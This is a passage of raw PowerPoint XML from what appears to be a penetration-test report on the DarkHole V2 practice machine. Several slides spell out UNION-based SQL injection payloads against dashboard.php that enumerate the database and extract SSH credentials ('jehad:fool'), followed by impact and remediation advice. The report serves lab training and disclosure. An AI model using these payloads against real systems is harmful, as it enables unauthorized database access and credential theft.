              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>='darkhole_2'-- - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(Found ssh table)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Steal Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=' UNION SELECT 1,user,pass,4,5,6 FROM ssh-- - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(Retrieved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73432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13338-B5E9-10D0-D353-06424EE2A4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D99147-4AE9-E49C-5844-C9F6FB132E25}"/>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A99C035E-E5C1-6087-62F2-3246986655FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="6261653" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Discovery:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> Identified SQLi via error-based testing (id=1' → 500 error).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used ORDER BY to enumerate columns.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Used UNION SELECT to map database structure and exfiltrate data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php?id=1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Confirm vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>via error (500 Internal Server Error)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Enumerate databases/tables: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>=id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38FE7949-3DFF-2F82-8B26-F50DE9A4BD20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6842234" y="474619"/>
            <a:ext cx="4782207" cy="2203324"/>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1D88F5BD-6F3C-2FF7-7E54-8B059C6B797F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6842234" y="3173695"/>
            <a:ext cx="4782207" cy="2533423"/>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679012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4246F-65F1-5C9C-7461-B7A9F9BD7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90FD01-A527-BAA6-342F-03C037A133AF}"/>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B0EFA29E-AFD8-87F3-9593-183985B18405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="6420679" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Display the tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>id=' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>='darkhole_2'-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Column names of the table: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>id=' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>='ssh'-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Extract credentials: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>=1' UNION SELECT 1,user,pass,4,5,6 FROM ssh-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Impact: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Immediate: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full database schema and credential exposure.                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Secondary: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complete system compromise (SSH → RCE → Root).</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49CF1597-C449-52B0-C5D7-EA7076E85BA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7288818" y="256033"/>
            <a:ext cx="3904699" cy="1871456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="50800" dist="38100" algn="l" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BFCEC5A-4200-8988-87F8-F662BE35C70D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7288818" y="2391690"/>
            <a:ext cx="3904699" cy="1871456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="50800" dist="38100" dir="18900000" algn="bl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E85C41B-28B9-46AC-65C4-4295CCBFCCA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7282343" y="4498786"/>
            <a:ext cx="3911173" cy="1871456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="50800" dist="38100" dir="18900000" algn="bl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2409239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BC60C-3E95-14A6-4308-5624B9F946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7B4E7-7565-6DA8-A144-89EE666E7164}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Table and Column Enumeration via SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77748001-0086-FCB4-1669-FA5A20BD04EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Table and Column Enumeration via SQL Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>DarkHole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> V2 web application is vulnerable to SQL Injection in the id parameter of the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> endpoint. This vulnerability allows to enumerate database tables and columns, leading to unauthorized access to sensitive information, including user credentials stored in the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t> Exploitable Parameter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>due to unauthenticated remote exploitation (AV:N), low attack complexity (AC:L), and full compromise of confidentiality, integrity, and availability (C:H/I:H/A:H). It enables complete system takeover via database/credential theft without user interaction (UI:N).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Risk / Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0"/>
              <a:t>Unauthorized Data Access: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Attackers can extract sensitive database information, including table names, column names, and credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0"/>
              <a:t>Authentication Bypass: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Extracted credentials can be used to gain unauthorized access to the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0"/>
              <a:t>Privilege Escalation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Database access may lead to further exploitation, such as remote code execution or privilege escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0"/>
              <a:t>nput Sanitization: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Use prepared statements (PDO/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0" err="1"/>
              <a:t>MySQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>) to prevent SQL injection,                                                                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0"/>
              <a:t>Web Application Firewall (WAF): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Deploy a WAF to filter malicious SQL payloads. Least Privilege,                                                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0"/>
              <a:t>Principle: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Restrict database user permissions to minimize exposure, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0"/>
              <a:t>Error Handling: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Disable detailed SQL error messages in production to prevent information leakage,                                                                                                                                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0"/>
              <a:t>Regular Security Audits: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Conduct periodic penetration tests to identify and remediate vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323379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79D5-2C10-628C-8400-7112EA77FC93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069848" y="335545"/>
            <a:ext cx="10058400" cy="419829"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Abstract</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C33B349-0532-20F6-92BC-F8CE973EFBE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069848" y="824948"/>
            <a:ext cx="10058400" cy="5347252"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="161A3E"/>
              </a:solidFill>
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="161A3E"/>
                </a:solidFill>
              </a:rPr>
